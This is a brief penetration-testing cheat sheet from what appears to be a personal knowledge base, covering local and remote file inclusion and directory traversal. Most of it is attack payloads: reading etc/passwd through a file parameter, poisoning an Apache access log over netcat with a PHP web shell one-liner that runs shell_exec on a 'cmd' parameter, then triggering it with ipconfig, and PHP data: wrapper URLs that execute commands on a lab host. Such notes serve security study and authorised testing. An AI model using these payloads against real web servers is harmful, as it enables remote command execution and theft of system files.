Malleum Knowledge Base

Directory Traversal and File Inculsion

1 min read

Local File Inclusion

  • Search for url which includes files like file=config.php.
  • Try to access different files like etc/passwd
  • Based on the operating system see if we can access log files.
  • Perform log file poising
nc targetdomain targetport

Log File Poisoning

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
  • Then access the log file
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote File inculsion

  • Instead of accessing local file access the remote files on our server.
  • This type of attacks are rarely possible.

PHP wrappers

  • If we are not able to ingest code in the access log you could try following in the Directory Traversal
http://10.11.0.22/menu.php?file=data:text/plain,hello world

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Graph View